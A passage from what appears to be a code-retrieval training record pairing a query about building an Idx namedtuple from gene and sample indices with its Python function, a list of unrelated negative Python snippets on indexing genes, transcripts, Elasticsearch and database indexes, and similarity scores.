print(organized_data)\n return [question, context, mean_reread_count, final_student_count]", "def count_region(\n reference_seq, # type: pyfaidx.Fasta\n region, # type: Tuple[str, int, int]\n pattern=None # type: Optional[str]\n): # type: (...) -> int\n\n chrom, start, end = region\n seq = reference_seq[chrom][int(start):int(end)]\n\n return _count_sequence(seq, regex=_build_regex(pattern))", "def read_counter(self, path):\n self.cursor.execute('SELECT * FROM \"counter\" WHERE \"fullpath\"=?', (path,))\n row = self.cursor.fetchone()\n count = 0\n if row != None : count = row[1]\n # print 'read_counter:', path, count\n return count", "def get_num_cat(sample_by_cat, samples_in_otus):\r\n num_cat = defaultdict(int)\r\n for cat, samples in sample_by_cat.items():\r\n num_samples = len(set(samples_in_otus) & set(samples))\r\n num_cat[cat[0]] += (num_samples * (num_samples - 1)) / 2\r\n return num_cat" ]
[ "0.71968734", "0.64680296", "0.624144", "0.60355866", "0.6020118", "0.58288175", "0.57842183", "0.5721398", "0.5674062", "0.56387067", "0.5625821", "0.5600439", "0.5572864", "0.55386955", "0.55117846", "0.550808", "0.5496517", "0.54497534", "0.5437835", "0.5402488", "0.5394301", "0.5366214", "0.5363972", "0.5338241", "0.53251344", "0.5300818", "0.5290096", "0.5253027", "0.5222011", "0.5221696", "0.52191573", "0.5175918", "0.51706153", "0.51699257", "0.5167019", "0.5161605", "0.5153482", "0.5121976", "0.50951433", "0.50930685", "0.50809497", "0.507583", "0.5046757", "0.50288826", "0.50248224", "0.50142854", "0.501218", "0.50121444", "0.50077", "0.50056845", "0.4996999", "0.49959436", "0.49957168", "0.4995682", "0.4992105", "0.4991454", "0.49905407", "0.4989414", "0.49833974", "0.49820817", "0.49780592", "0.49748522", "0.49697375", "0.49668804", "0.4958708", "0.49490687", "0.49428323", "0.49385154", "0.49334276", "0.49294335", "0.49261394", "0.49184963", "0.49151227", "0.49131745", "0.49089465", "0.49073097", "0.4903559", "0.49018472", "0.49009436", "0.4893753", "0.48911914", "0.488613", "0.48794642", "0.4879093", "0.48776734", "0.48734754", "0.48650447", "0.48616827", "0.48571163", "0.48546368", "0.4854573", "0.4847396", "0.4843254", "0.4842486", "0.4836102", "0.48353195", "0.4831139", "0.48232207", "0.48231754", "0.4819829" ]
0.5925086
5
Create an aggregated Index with namedtuple Idx; combine the gene_idx and sample_idx
def get_idx(countinfo, sample, gene_idx):
    if not countinfo is None:
        if not sample in countinfo.sample_idx_dict:
            sample_idx = None
            logging.warning("utils.py: The sample {} is not in the count file. Program proceeds without outputting expression data.".format(sample))
        else:
            sample_idx = countinfo.sample_idx_dict[sample]
    else:
        sample_idx = None
    return Idx(gene_idx, sample_idx)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def build_gene_indexes(df):\n\tgeneDict = OrderedDict()\n\n\tgeneCount = 0\n\tpreviousGeneIndex = 0\n\n\tcurrent_id=\"\"\n\tcurrent_gene=\"\"\n\n\tfor i in range(len(df)):\n\n\t\tif df.loc[i,'feature'] == 'gene':\n\t\t\ttrdict = parse_entry(df.loc[i,'transcript_id'])\n\n\t\t\tcurGeneID = trdict['gene_id'][0]\n\t\t\n\t\t\tif geneCount != 0:\n\t\t\t\tnewGeneIndex = i\n\t\t\t\tgeneDict[current_id] = [previousGeneIndex,newGeneIndex]\n\t\t\t\tpreviousGeneIndex = i\n\t\t\t\tcurrent_id = trdict['gene_id'][0]\n\t\t\t\tgeneCount += 1\n\n\t\t\telse:\n\t\t\t\tnewgeneIndex = 0\n\t\t\t\tgeneCount +=1\n\t\t\t\tcurrent_id = trdict['gene_id'][0]\n\t\tif i == (len(df)-1):\n\t\t\tnewGeneIndex = i+1\n\t\t\tcurrent_id = trdict['gene_id'][0]\n\t\t\tgeneDict[current_id] = [previousGeneIndex,newGeneIndex]\n\treturn geneDict", "def build_index():\n pass", "def create_index():", "def index_add(all_index, this_index, samples, caller):\n for key, record in this_index.iteritems():\n if key not in all_index:\n all_index[key] = {}\n for sample_id in samples:\n if sample_id not in all_index[key]:\n all_index[key][sample_id] = {caller: []}\n elif caller not in all_index[key][sample_id]:\n all_index[key][sample_id][caller] = []\n # NB: If caller was run twice, will have 2 records here\n all_index[key][sample_id][caller].append(record)", "def _idx(name, at_level=None, type=None):\n cls = pd.Index\n kwargs = dict(name=name)\n\n if name == 'CURRENCY':\n data = ['NZD', 'RUB']\n elif name == 'TIME_PERIOD':\n data = ['2013-01-18', '2013-01-21']\n if type == pd.Period:\n cls = pd.PeriodIndex\n kwargs['freq'] = 'D'\n\n idx = cls(data, **kwargs)\n\n if at_level is not None:\n # Add sample_attrs as extra pd.MultiIndex levels on df.columns\n names = list(sample_attrs.keys())\n iterables = [[v] for v in sample_attrs.values()]\n names.insert(at_level, name)\n iterables.insert(at_level, idx)\n return pd.MultiIndex.from_product(iterables, names=names)\n else:\n return idx", "def return_index(self, idx):\n return (\n self.timeseries[idx],\n self.ch_amount,\n self.freq[idx],\n self.ch_name[idx],\n self.units[idx],\n )", "def index_object(idxs=None):", "def build_index(self):\n self.rebuild_index()", "def return_index(self, idx):\n return (\n self.timeseries[:, idx],\n self.ch_amount,\n self.freq,\n self.ch_name[idx],\n self.units[idx],\n self.start_time,\n )", "def create_index(log_df, column):\n temp_list = log_df[[column]].values.tolist()\n subsec_set = {(x[0]) for x in temp_list}\n subsec_set = sorted(list(subsec_set))\n alias = dict()\n for i, _ in enumerate(subsec_set):\n alias[subsec_set[i]] = i + 1\n return alias", "def generate_inv_index(people):\n pass", "def createindexes():\n index = [{}, {}, {}, {}]\n readcorpus(index)\n buildindex4(index[2], index[3])\n writeindextofile(index)\n return index", "def index(self, index):\n index.column_protein[self.column].add((self.protein,self.protein_res))\n index.protein_domain[(self.protein.id,self.protein_res)] = (self.domain,self.domain_res)\n index.domain_structure[(self.domain.id,self.domain_res)].add((self.structure,self.structure_res))\n index.structure[(self.structure.index, self.structure_res)] = self", "def get_index(self, _quals):\n return self._options['index']", "def _get_ea_index():\n ea_index_temp = {'Address': 5, 'Agency': 10, 'City': 4, 'Country': 3,\n 'Datacenter': 7, 'Division': 8, 'Interface Name': 13,\n 'Region_List': 2, 'Requester Email': 9, 'Site': 6,\n 'VLAN Description': 11, 'IPR Designation': 16}\n return ea_index_temp", "def _generate_index_analysis(self, 
query_analysis, indexes):\r\n needs_recommendation = True\r\n full_indexes = []\r\n partial_indexes = []\r\n coverage = \"unknown\"\r\n\r\n if indexes is not None:\r\n for index_key in indexes.keys():\r\n index = indexes[index_key]\r\n index_report = self._generate_index_report(index,\r\n query_analysis)\r\n if index_report['supported'] is True:\r\n if index_report['coverage'] == 'full':\r\n full_indexes.append(index_report)\r\n if index_report['idealOrder']:\r\n needs_recommendation = False\r\n elif index_report['coverage'] == 'partial':\r\n partial_indexes.append(index_report)\r\n\r\n if len(full_indexes) > 0:\r\n coverage = \"full\"\r\n elif (len(partial_indexes)) > 0:\r\n coverage = \"partial\"\r\n elif query_analysis['supported']:\r\n coverage = \"none\"\r\n\r\n # INDEX ANALYSIS\r\n return OrderedDict([('indexStatus', coverage),\r\n ('fullIndexes', full_indexes),\r\n ('partialIndexes', partial_indexes)])", "def create_indices():\n destroy_indices()\n\n ActionDocument._index.create(ignore=[400, 404])\n ClassificationDocument._index.create(ignore=[400, 404])\n FunctionDocument._index.create(ignore=[400, 404])\n PhaseDocument._index.create(ignore=[400, 404])\n RecordDocument._index.create(ignore=[400, 404])\n\n yield\n\n destroy_indices()", "def create_index(shapes_with_props):\n index = rtree.index.Index()\n for id, shape_with_props in enumerate(shapes_with_props):\n index.insert(id, shape_with_props.shape.bounds)\n return index", "def get_index(self, *args, **dargs):\n pass", "def _generate_index_analysis(self, query_analysis, indexes):\n needs_recommendation = True\n full_indexes = []\n partial_indexes = []\n coverage = \"unknown\"\n\n if indexes is not None:\n for index_key in indexes.keys():\n index = indexes[index_key]\n index_report = self._generate_index_report(index,\n query_analysis)\n if index_report['supported'] is True:\n if index_report['coverage'] == 'full':\n full_indexes.append(index_report)\n if index_report['idealOrder']:\n needs_recommendation = False\n elif index_report['coverage'] == 'partial':\n partial_indexes.append(index_report)\n\n if len(full_indexes) > 0:\n coverage = \"full\"\n elif (len(partial_indexes)) > 0:\n coverage = \"partial\"\n elif query_analysis['supported']:\n coverage = \"none\"\n\n # INDEX ANALYSIS\n return OrderedDict([('indexStatus', coverage),\n ('fullIndexes', full_indexes),\n ('partialIndexes', partial_indexes)])", "def _group_indexes(self, indexes):\n for index_name, (cardinality, link_names) in indexes:\n for link_name in link_names:\n yield link_name, index_name", "def combine_index(vcf_fnames):\n data_pile = collections.defaultdict(list)\n all_idx = collections.OrderedDict()\n all_samples = set()\n vcf_to_samples={}\n for vcf_fname in vcf_fnames:\n vr = vcf.Reader(filename=vcf_fname)\n caller = guess_caller(vr)\n samples = clean_samples(vr)\n vr.samples = samples\n idx = index_records(vr)\n print(vcf_fname, len(idx), caller, *samples, sep='\\t', file=sys.stderr)\n vcf_to_samples[vcf_fname] = samples\n data_pile[caller].append((idx, samples))\n all_samples.update(samples)\n for idx, samples, caller in cleanse_callers(data_pile):\n index_add(all_idx, idx, samples, caller)\n return sorted(all_idx.iteritems(), key=sortkey), sorted(all_samples), vcf_to_samples", "def instantiate_indexor(prefix, width):\n stdlib = py_ast.Stdlib()\n name = py_ast.CompVar(NAME_SCHEME[\"index name\"].format(prefix=prefix))\n add_name = py_ast.CompVar(f\"{prefix}_add\")\n cells = [\n py_ast.Cell(name, stdlib.register(width)),\n py_ast.Cell(add_name, 
stdlib.op(\"add\", width, signed=False)),\n ]\n\n init_name = py_ast.CompVar(NAME_SCHEME[\"index init\"].format(prefix=prefix))\n init_group = py_ast.Group(\n init_name,\n connections=[\n py_ast.Connect(\n py_ast.ConstantPort(width, 2 ** width - 1), py_ast.CompPort(name, \"in\")\n ),\n py_ast.Connect(\n py_ast.ConstantPort(1, 1), py_ast.CompPort(name, \"write_en\")\n ),\n py_ast.Connect(\n py_ast.CompPort(name, \"done\"), py_ast.HolePort(init_name, \"done\")\n ),\n ],\n )\n\n upd_name = py_ast.CompVar(NAME_SCHEME[\"index update\"].format(prefix=prefix))\n upd_group = py_ast.Group(\n upd_name,\n connections=[\n py_ast.Connect(\n py_ast.ConstantPort(width, 1), py_ast.CompPort(add_name, \"left\")\n ),\n py_ast.Connect(\n py_ast.CompPort(name, \"out\"), py_ast.CompPort(add_name, \"right\")\n ),\n py_ast.Connect(\n py_ast.CompPort(add_name, \"out\"), py_ast.CompPort(name, \"in\")\n ),\n py_ast.Connect(\n py_ast.ConstantPort(1, 1), py_ast.CompPort(name, \"write_en\")\n ),\n py_ast.Connect(\n py_ast.CompPort(name, \"done\"), py_ast.HolePort(upd_name, \"done\")\n ),\n ],\n )\n\n return (cells, [init_group, upd_group])", "def gen_search_index(record, link_content=None):\n document_id = record[\"document_id\"]\n record_index = {\n \"document_name\": record[\"document_name\"],\n \"document_type\": record[\"document_type\"].__name__,\n \"content\": record[\"content\"],\n \"authors\": record[\"authors\"],\n \"publish_date\": record[\"publish_date\"],\n \"link_content\": link_content,\n }\n return (document_id, record_index)", "def _index_key(self, sig, codegen):\n return (sig, codegen.magic_tuple())", "def gene(self, idx):\r\n return self.genes[idx]", "def _construct_index(self, row) -> str:\n chrom = row[\"CHROM\"]\n pos = row[\"POS\"]\n ref = row[\"REF\"]\n alt = row[\"ALT\"]\n\n return f\"{chrom}_{pos}_{ref}>{alt}\"", "def build_transcript_indexes(geneDictCoding, df):\n\n\tTR_index_dict = OrderedDict()\n\n\tfor gene in geneDictCoding:\n\n\t\ttrDF = df.iloc[geneDictCoding[gene][0]:geneDictCoding[gene][1]]\n\t\n\t\ttrPrev = -1\n\t\ttrNamePrev = \"\"\n\t\t\n\t\t### iterate through a slice of the data frame for each gene\n\t\t### search for transcripts over that slice\n\t\t### find transcript slices\n\t\tfor i in range(geneDictCoding[gene][0], geneDictCoding[gene][1]):\n\t\t\tif trDF.loc[i,'feature'] == 'transcript':\n\t\t\t\ttrdict = parse_entry(trDF.loc[i,'transcript_id'])\n\t\t\t\ttrCur = i\n\t\t\t\ttrNameCur = trdict['transcript_id'][0]\n\t\t\t\t\n\t\t\t\tif trPrev != -1: # do not make an entry for the first transcript\n\t\t\t\t\tTR_index_dict[trNamePrev] = [trPrev, trCur]\n\n\t\t\t\ttrPrev = trCur\n\t\t\t\ttrNamePrev = trNameCur\n\t\t\t\n\t\t\t### for the final transcript\n\t\t\tif i == geneDictCoding[gene][1]-1:\n\t\t\t\ttrdict = parse_entry(trDF.loc[i,'transcript_id'])\n\t\t\t\tTR_index_dict[trdict['transcript_id'][0]] = [trCur, i+1]\n\treturn TR_index_dict", "def __reduce__(self):\n d = {\n \"levels\": list(self.levels),\n \"codes\": list(self.codes),\n \"sortorder\": self.sortorder,\n \"names\": list(self.names),\n }\n return ibase._new_Index, (type(self), d), None", "def init_index(self):\n raise NotImplementedError", "def _generate_sample_indexes(random_state, n_samples, n_samples_bootstrap):\n # Obtain the random state\n random_state = check_random_state(random_state)\n\n # Obtain the indexes for the samples taking\n # into account the total number of samples\n # and the number of samples to be taken\n sample_indexes = random_state.randint(0, n_samples, n_samples_bootstrap)\n\n # Return 
them\n return sample_indexes", "def create_metadata_indices(meta_file):\n logging.info('Loading gene metadata...')\n # genes\n header = {}\n #gene_idx = {}\n idx = collections.defaultdict(dict)\n tax_levs = ['domain','phylum','class','order','family','genus','species']\n with open(meta_file) as inF:\n for i,line in enumerate(inF):\n line = line.rstrip().split('\\t')\n if i == 0:\n header = {x.lower():i for i,x in enumerate(line)}\n continue\n # genes\n cluster_id = line[header['annotation']]\n gene_uuid = line[header['gene_uuid']]\n genomeID = line[header['genomeid']]\n genome_len = line[header['genome_len']]\n tax = tuple([line[header[x]] for x in tax_levs])\n try:\n idx[cluster_id][tax][genomeID]['gene_ids'].append(gene_uuid)\n except KeyError:\n idx[cluster_id][tax] = {genomeID : {'gene_ids' : [gene_uuid],\n 'genome_len' : genome_len}}\n metadata_summary(idx)\n return idx", "def create_index(self):\r\n\r\n #### Begin functionality here\r\n\r\n return()", "def construct_indu_index_mapping(df):\n industries_to_index = {}\n industries = df[\"ggroup\"].dropna().astype(int).unique()\n industries = industries.tolist()\n quarters = (df[\"year\"].astype(\"str\") + \" q\" + df[\"quarter\"].astype(\"str\")).unique()\n for i in range(df.shape[0]):\n row = df.iloc[i, :]\n if math.isnan(row[\"ggroup\"]):\n continue\n industries_to_index[int(row[\"ggroup\"])] = industries_to_index.get(int(row[\"ggroup\"]), set())\n industries_to_index[int(row[\"ggroup\"])].add(i)\n return industries_to_index", "def build_index(self):\n \n \n geoids = self.partitions.find_or_new(table='facilities_geoids')\n addresses = self.partitions.find_or_new(table='facilities_addresses')\n facilities = self.partitions.find(table='facilities')\n \n facilities.attach(addresses,'addresses')\n facilities.attach(geoids,'geoids')\n \n q = \"\"\"\n SELECT year, type, oshpd_id, facility_name, dba_city, dba_zip_code, blockgroup_gvid, tract_gvid, county_gvid\n FROM facilities\n JOIN geoids.facilities_geoids AS geoids ON geoids.facilities_id = facilities.id\n JOIN addresses.facilities_addresses AS addresses ON addresses.facilities_id = facilities.id\n \"\"\"\n \n p = self.partitions.find_or_new(table='facilities_index')\n p.clean()\n lr = self.init_log_rate()\n \n with p.inserter() as ins:\n for row in facilities.query(q):\n ins.insert(row)\n lr(str(p.identity))", "def __return_feature_index__(self, tup):\n index = self._features_index.get(tup, False)\n return index", "def _build_groupby_indices(df, table_name, join_columns):\n log.info(\"Grouping table '{}' by: {}.\".format(table_name,\n \", \".join(join_columns)))\n ret = df.groupby(join_columns).indices\n if len(join_columns) == 1:\n # Manually patch the dictionary to make sure its keys are tuples.\n ret = {(k,): v for k, v in ret.items()}\n return ret", "def build_coverage_index(\n self,\n data_pack: DataPack,\n outer_type: Type[Annotation],\n inner_type: Type[EntryType]):\n if not isinstance(inner_type, (Annotation, Link, Group)):\n raise ValueError(f\"Do not support coverage index for {inner_type}.\")\n\n if not self.coverage_index_is_valid:\n self._coverage_index = dict()\n\n # prevent the index from being used during construction\n self.deactivate_coverage_index()\n\n self._coverage_index[(outer_type, inner_type)] = dict()\n for range_annotation in data_pack.get_entries_by_type(outer_type):\n if isinstance(range_annotation, Annotation):\n entries = data_pack.get(inner_type, range_annotation)\n entry_ids = {e.tid for e in entries}\n self._coverage_index[\n (outer_type, 
inner_type)][range_annotation.tid] = entry_ids\n\n self.activate_coverage_index()", "def create_index_item(doc, destination_index):\n\n action = { 'index' : { '_index' : destination_index, '_type' : doc['_type'] } }\n data = doc['_source']\n return action, data", "def _BuildEventTagIndex(self):\n self._event_tag_index = {}\n for event_tag in self.GetEventTags():\n event_identifier = event_tag.GetEventIdentifier()\n lookup_key = event_identifier.CopyToString()\n self._event_tag_index[lookup_key] = event_tag.GetIdentifier()", "def _generate_index_report(self, index, query_analysis):\r\n\r\n all_fields = []\r\n equiv_fields = []\r\n sort_fields = []\r\n range_fields = []\r\n\r\n for query_field in query_analysis['analyzedFields']:\r\n all_fields.append(query_field['fieldName'])\r\n if query_field['fieldType'] is EQUIV_TYPE:\r\n equiv_fields.append(query_field['fieldName'])\r\n elif query_field['fieldType'] is SORT_TYPE:\r\n sort_fields.append(query_field['fieldName'])\r\n elif query_field['fieldType'] is RANGE_TYPE:\r\n range_fields.append(query_field['fieldName'])\r\n\r\n max_equiv_seq = len(equiv_fields)\r\n max_sort_seq = max_equiv_seq + len(sort_fields)\r\n max_range_seq = max_sort_seq + len(range_fields)\r\n\r\n coverage = 'none'\r\n query_fields_covered = 0\r\n query_field_count = query_analysis['fieldCount']\r\n supported = True\r\n ideal_order = True\r\n for index_field in index['key']:\r\n field_name = index_field[0]\r\n\r\n if index_field[1] == '2d':\r\n supported = False\r\n break\r\n\r\n if field_name not in all_fields:\r\n break\r\n\r\n if query_fields_covered == 0:\r\n coverage = 'partial'\r\n\r\n if query_fields_covered < max_equiv_seq:\r\n if field_name not in equiv_fields:\r\n ideal_order = False\r\n elif query_fields_covered < max_sort_seq:\r\n if field_name not in sort_fields:\r\n ideal_order = False\r\n elif query_fields_covered < max_range_seq:\r\n if field_name not in range_fields:\r\n ideal_order = False\r\n query_fields_covered += 1\r\n if query_fields_covered == query_field_count:\r\n coverage = 'full'\r\n\r\n # INDEX REPORT\r\n return OrderedDict({\r\n 'coverage': coverage,\r\n 'idealOrder': ideal_order,\r\n 'queryFieldsCovered': query_fields_covered,\r\n 'index': index,\r\n 'supported': supported\r\n })", "def _generate_index_report(self, index, query_analysis):\n\n all_fields = []\n equiv_fields = []\n sort_fields = []\n range_fields = []\n\n for query_field in query_analysis['analyzedFields']:\n all_fields.append(query_field['fieldName'])\n if query_field['fieldType'] is EQUIV_TYPE:\n equiv_fields.append(query_field['fieldName'])\n elif query_field['fieldType'] is SORT_TYPE:\n sort_fields.append(query_field['fieldName'])\n elif query_field['fieldType'] is RANGE_TYPE:\n range_fields.append(query_field['fieldName'])\n\n max_equiv_seq = len(equiv_fields)\n max_sort_seq = max_equiv_seq + len(sort_fields)\n max_range_seq = max_sort_seq + len(range_fields)\n\n coverage = 'none'\n query_fields_covered = 0\n query_field_count = query_analysis['fieldCount']\n supported = True\n ideal_order = True\n for index_field in index['key']:\n field_name = index_field[0]\n\n if index_field[1] == '2d':\n supported = False\n break\n\n if field_name not in all_fields:\n break\n\n if query_fields_covered == 0:\n coverage = 'partial'\n\n if query_fields_covered < max_equiv_seq:\n if field_name not in equiv_fields:\n ideal_order = False\n elif query_fields_covered < max_sort_seq:\n if field_name not in sort_fields:\n ideal_order = False\n elif query_fields_covered < max_range_seq:\n if 
field_name not in range_fields:\n ideal_order = False\n query_fields_covered += 1\n if query_fields_covered == query_field_count:\n coverage = 'full'\n\n # INDEX REPORT\n return OrderedDict({\n 'coverage': coverage,\n 'idealOrder': ideal_order,\n 'queryFieldsCovered': query_fields_covered,\n 'index': index,\n 'supported': supported\n })", "def index_stmt(self, idx):\n return Statement(\"index\", self, idx)", "def anno_gene_stats(anno_gene, loc_file, gene_file, isConvert):\r\n LocationNum = collections.Counter()\r\n LocationGene = collections.defaultdict(list)\r\n\r\n\r\n GeneCatSample = collections.defaultdict(lambda: collections.defaultdict(list))\r\n CatGeneSample = collections.defaultdict(lambda: collections.defaultdict(list))\r\n\r\n allLocations = set()\r\n anno_h = open(anno_gene, \"r\")\r\n for line in anno_h:\r\n lines = line.strip().split(\"\\t\")\r\n sample, location, number, gene = lines[:4]\r\n number = int(number)\r\n\r\n ### whether convert the category to \"Exon\" or \"Intron\"\r\n if isConvert == \"True\":\r\n if location == \"Intron\":\r\n newLoc = \"Intron\"\r\n else:\r\n newLoc = \"Exon\"\r\n elif isConvert == \"False\":\r\n newLoc = location\r\n else:\r\n print(\"Please check whether convert the original category to 'Intron' or 'Exon' based on True of False.\")\r\n sys.exit(1)\r\n\r\n allLocations.add(newLoc)\r\n ### get the dict of gene -> location -> sample\r\n genes = gene.split(\",\")\r\n for g in genes:\r\n GeneCatSample[g][newLoc].append(sample)\r\n\r\n ### get the location -> gene -> sample\r\n CatGeneSample[newLoc][g].append(sample)\r\n anno_h.close()\r\n\r\n\r\n ## output gene and number in samples\r\n ### sort all locations\r\n sortedAllLocation = sorted(list(allLocations))\r\n\r\n gene_h = open(gene_file, \"w\")\r\n\r\n headerSample = [l + \"_samples\" for l in sortedAllLocation]\r\n gene_h.write(\"Gene\\tTotal\\t%s\\t%s\\n\" % (\"\\t\".join(sortedAllLocation), \"\\t\".join(headerSample)))\r\n\r\n GeneRecord = {}\r\n GeneNumber = {}\r\n\r\n allGenes = sorted(list(GeneCatSample.keys()))\r\n for ge in allGenes:\r\n ### get the number and samples for each location of each gene\r\n GeneNum = []\r\n GeneSample = []\r\n\r\n for loc in sortedAllLocation:\r\n if loc in GeneCatSample[ge]:\r\n samples = GeneCatSample[ge][loc]\r\n ##############################\r\n ####### unique for samples\r\n samples = sorted(list(set(samples)))\r\n sampleNum = len(samples)\r\n else:\r\n sampleNum = 0\r\n samples = [\"-\"]\r\n\r\n GeneNum.append(sampleNum)\r\n GeneSample.append(samples)\r\n\r\n GeneNumSum = sum(GeneNum)\r\n CatNumOut = \"\\t\".join([str(g) for g in GeneNum])\r\n CatSampleOut = \"\\t\".join([\",\".join(s) for s in GeneSample])\r\n\r\n record = \"%s\\t%d\\t%s\\t%s\\t\" % (ge, GeneNumSum, CatNumOut, CatSampleOut)\r\n GeneNumber[ge] = GeneNumSum\r\n GeneRecord[ge] = record\r\n \r\n ### output\r\n GeneNumSorted = sort_dict_value(GeneNumber)\r\n for g, n in GeneNumSorted:\r\n r = GeneRecord[g]\r\n gene_h.write(\"%s\\n\" % r)\r\n\r\n gene_h.close() \r\n\r\n\r\n ### location and genes\r\n loc_h = open(loc_file, \"w\")\r\n loc_h.write(\"Location\\tGeneNumber\\tGenes\\tSampleNumber\\tSamples\\n\")\r\n for loc in sortedAllLocation:\r\n geneSample = CatGeneSample[loc]\r\n genes = sorted(list(geneSample.keys()))\r\n geneNum = len(genes)\r\n samNum = 0\r\n samList = []\r\n for ge in geneSample:\r\n sam = geneSample[ge]\r\n samList.append(sam)\r\n samNum += len(sam)\r\n samOut = \";\".join([\",\".join(s) for s in samList])\r\n loc_h.write(\"%s\\t%d\\t%s\\t%d\\t%s\\n\" % (loc, 
geneNum, \",\".join(genes), samNum, samOut))\r\n loc_h.close()", "def from_index(cls, index):\n return cls(name=index.name or None,\n fields=index.fields)", "def _compute_commonindex(self, index):\n # Shorten the computations with direct access to raw object\n hist = self._hist\n\n # Support dict access\n if hasattr(index, \"items\"):\n indexes = [slice(None)] * hist.rank()\n for k, v in index.items():\n indexes[k] = v\n\n # Normalize -> h[i] == h[i,]\n else:\n if not isinstance(index, tuple):\n index = (index,)\n # Now a list\n indexes = _expand_ellipsis(index, hist.rank())\n\n if len(indexes) != hist.rank():\n raise IndexError(\"Wrong number of indices for histogram\")\n\n # Allow [bh.loc(...)] to work\n for i in range(len(indexes)):\n # Support sum and rebin directly\n if indexes[i] is sum or hasattr(indexes[i], \"factor\"):\n indexes[i] = slice(None, None, indexes[i])\n # General locators\n elif callable(indexes[i]):\n indexes[i] = indexes[i](self.axes[i])\n elif hasattr(indexes[i], \"__index__\"):\n if abs(indexes[i]) >= hist.axis(i).size:\n raise IndexError(\"histogram index is out of range\")\n indexes[i] %= hist.axis(i).size\n\n return indexes", "def _index_group_with_subgroup(self, **kwargs):\n\n log.setLevel(self.log_level)\n # get a list of all the uri to index\n uri_list = kwargs.get('uri_list', self.get_uri_list())\n if not uri_list:\n log.info(\"0 items to index\")\n return\n # results = results[:100]\n # Start processing through uri\n batch_file = os.path.join(CFG.dirs.logs, \"batch_list.txt\")\n # with open(batch_file, \"w\") as fo:\n # fo.write(\"{\")\n log.info(\"'%s' items to index\", len(uri_list))\n self.time_start = datetime.datetime.now()\n batch_size = kwargs.get(\"batch_size\", 12000)\n if len(uri_list) > batch_size:\n batch_end = batch_size\n else:\n batch_end = len(uri_list)\n batch_start = 0\n batch_num = 1\n self.batch_data = {}\n self.batch_data[batch_num] = {}\n self.batch_data[batch_num]['main'] = []\n self.batch_uris = {}\n self.batch_uris[batch_num] = []\n for name, indexer in self.other_indexers.items():\n self.batch_data[batch_num][name] = []\n end = False\n last = False\n final_list = []\n expand_index = kwargs.get(\"expand_index\", True)\n while not end:\n log.debug(\"batch %s: %s-%s\", batch_num, batch_start, batch_end)\n sub_batch = []\n j = 0\n for i in range(batch_start, batch_end):\n # for i, subj in enumerate(uri_list[batch_start:batch_end]):\n qry_size = kwargs.get(\"qry_size\", 1000)\n if j < qry_size:\n try:\n sub_batch.append(uri_list.pop()) #subj)\n except IndexError:\n pass\n if j == qry_size -1 or i == batch_end - 1:\n try:\n sub_batch.append(uri_list.pop()) #subj)\n except IndexError:\n pass\n # with open(batch_file, \"a\") as fo:\n # fo.write(json.dumps({str('%s-%s' % (batch_num, i+1)):\n # [item[0].sparql\n # for item in sub_batch]})[1:-1]+\",\\n\")\n if not kwargs.get(\"no_threading\", False):\n th = threading.Thread(name=batch_start + i + 1,\n target=self._index_sub,\n args=(sub_batch,\n i+1,\n batch_num,))\n th.start()\n else:\n self._index_sub(sub_batch, i+1, batch_num)\n j = 0\n final_list += sub_batch\n sub_batch = []\n else:\n j += 1\n log.debug(datetime.datetime.now() - self.time_start)\n if not kwargs.get(\"no_threading\", False):\n main_thread = threading.main_thread()\n for t in threading.enumerate():\n if t is main_thread:\n continue\n t.join()\n action_list = []\n for key, items in self.batch_data[batch_num].items():\n if key == 'main':\n es_worker = self.es_worker\n else:\n es_worker = self.other_indexers[key]\n 
action_list += es_worker.make_action_list(items)\n result = self.es_worker.bulk_save(action_list)\n final_list += self.batch_uris[batch_num]\n self._update_triplestore(result, action_list)\n del action_list\n del self.batch_uris[batch_num]\n del self.batch_data[batch_num]\n try:\n del pyrdf.memorized\n pyrdf.memorized = {}\n except AttributeError:\n pass\n while gc.collect() > 0:\n pass\n # pdb.set_trace()\n batch_end += batch_size\n batch_start += batch_size\n if last:\n end = True\n if len(uri_list) <= batch_size:\n batch_end = len(uri_list)\n last = True\n batch_num += 1\n self.batch_uris[batch_num] = []\n self.batch_data[batch_num] = {}\n self.batch_data[batch_num]['main'] = []\n for name, indexer in self.other_indexers.items():\n self.batch_data[batch_num][name] = []\n log.debug(datetime.datetime.now() - self.time_start)\n # with open(batch_file, 'rb+') as fo:\n # fo.seek(-2, os.SEEK_END)\n # fo.truncate()\n # # fo.close()\n # fo.write(\"}\".encode())", "def get_indices(self):\n\n def query(rel): \n return \"\"\"SELECT pg_class.relname, pg_index.indkey\n FROM pg_class, pg_index\n WHERE (pg_index.indexrelid = pg_class.oid)\n AND (pg_index.indrelid = (SELECT pg_class.oid FROM pg_class WHERE pg_class.relname = \\'{}\\'));\n \"\"\".format(rel)\n\n rels = tpch.schema.keys()\n idxs = dict.fromkeys(rels)\n\n with self.tpch_cxn.cursor() as curs:\n for rel in rels:\n curs.execute(query(rel))\n idxs_ = curs.fetchall()\n idxs_ = dict(idxs_) # index -> index keys \n \n # TODO this can be done cleanly in query\n # pg_index.indkey is a SQL array of attributes indices in their respective tables\n split=lambda attrs: attrs.split() \n cast=lambda attrs: list(map(lambda attr: int(attr)-1, attrs))\n invertindex=lambda attrs: list(np.array(schema[rel])[attrs])\n\n attrs = idxs_.values() \n attrs = list(map(split, attrs))\n attrs = list(map(cast, attrs))\n attrs = list(map(invertindex, attrs))\n\n idxs_ = {key : attrs[i] for i, key in enumerate(idxs_.keys())}\n idxs[rel] = idxs_\n return idxs", "def _index_build(self, index_def):\n for index_data in index_def['key']:\n if index_data[0] == '_id' and len(index_def['key']) == 1:\n return 'Default Index'\n else:\n if index_def.get('background') == True:\n return 'Background'\n else:\n return 'Foreground'", "def index(self):\n if hasattr(self, '_m_index'):\n return self._m_index if hasattr(self, '_m_index') else None\n\n self._m_index = (self.index_separate if self.is_index_separate else self.index_in_tag)\n return self._m_index if hasattr(self, '_m_index') else None", "def generate_template(index_name):\n\n document = _BuildResultsMetaDocument()\n index = Index(name=index_name)\n index.document(document)\n index.settings(refresh_interval=\"30s\", number_of_shards=\"1\", number_of_replicas=\"1\")\n index.aliases(**{index_name: {}})\n index_template = index.as_template(template_name=\"template_\" + index_name, pattern=\"%s-*\" % index_name)\n return index_template.to_dict()", "def _index(self):\n return es.index(CLUSTER_NAME, 'record', self.dict, id=self.uuid)", "def _make_index(self, fname, sents, words):\n for w in words:\n # word index for this file only\n findex = []\n\n for ixS, s in enumerate(sents):\n # iterate over each word in the sentencep\n for ixT, token in enumerate(s):\n # could use regex for substring matching instead\n if w == token.lower():\n findex.append((ixS, ixT))\n # keep track of word use frequency\n self._freq[w] += 1\n\n # grow 